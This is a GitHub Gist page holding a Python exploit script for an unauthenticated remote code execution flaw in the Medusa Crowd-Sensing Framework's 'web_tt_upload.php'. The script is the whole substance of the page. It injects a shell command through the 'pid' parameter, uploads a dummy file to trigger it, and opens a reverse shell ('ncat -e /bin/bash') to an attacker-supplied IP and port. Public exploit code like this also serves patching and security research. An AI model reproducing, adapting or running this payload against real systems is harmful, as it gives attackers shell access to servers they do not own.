Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Unauthenticated RCE - Medusa Crowd-Sensing Framework
#!/usr/bin/python
'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28
'''
import requests
import sys
import os
if len(sys.argv) != 4:
print "[+] Usage : ./exploit.py url local_ip local_port"
sys.exit(0)
url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port)
full_url = url + payload
# create a file with some junk data to send
os.system("echo 111 > /tmp/medusa-exploit.txt")
files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")}
print "[+]Sending Payload , check your shell !"
requests.post(full_url, files=files)
# remove the created file
os.system("rm /tmp/medusa-exploit.txt")
print "[+]Temp file removed !"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment